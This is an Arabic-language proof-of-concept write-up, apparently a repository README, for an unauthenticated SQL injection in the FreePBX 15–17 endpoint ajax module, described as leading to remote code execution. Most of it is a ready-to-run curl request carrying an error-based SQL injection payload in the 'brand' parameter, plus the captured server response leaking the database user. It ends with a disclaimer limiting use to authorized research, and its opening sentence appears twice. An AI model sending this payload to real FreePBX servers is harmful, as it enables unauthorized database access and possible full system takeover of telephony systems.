
تحتوي إصدارات FreePBX 15 و16 و17 على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) ناتجة عن عدم كفاية تعقيم البيانات التي يقدمها المستخدم في نقاط النهاية.
تحتوي إصدارات FreePBX 15 و16 و17 على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) ناتجة عن عدم كفاية تعقيم البيانات المقدمة من المستخدم في نقاط النهاية.
يمكن لمهاجم غير مصادق عليه التلاعب بقاعدة البيانات وتحقيق تنفيذ تعليمات برمجية عن بُعد. لا يتطلب الاستغلال أي مصادقة.
ملاحظة: تم حجب الهدف. استبدل
[REDACTED_TARGET]بالمضيف الحقيقي عند إجراء اختبارات مصرح بها.
curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"
HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}
لماذا يثبت هذا الأمر: تحتوي الاستجابة على ~USER:freepbxuser@localhost~ — مما يؤكد حقن SQL / الكشف عن البيانات من طلب غير مصادق عليه.
التلاعب عن بُعد بقاعدة البيانات بدون مصادقة مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية على الخادم — مع إمكانية اختراق النظام بالكامل.
تم توفير هذا المستودع وإثبات المفهوم (PoC) لأغراض تعليمية وبحوث أمنية مصرح بها فقط. لا تختبر أو تستغل الأنظمة دون إذن صريح. المؤلف غير مسؤول عن سوء الاستخدام أو الأضرار الناتجة عن إثبات المفهوم هذا.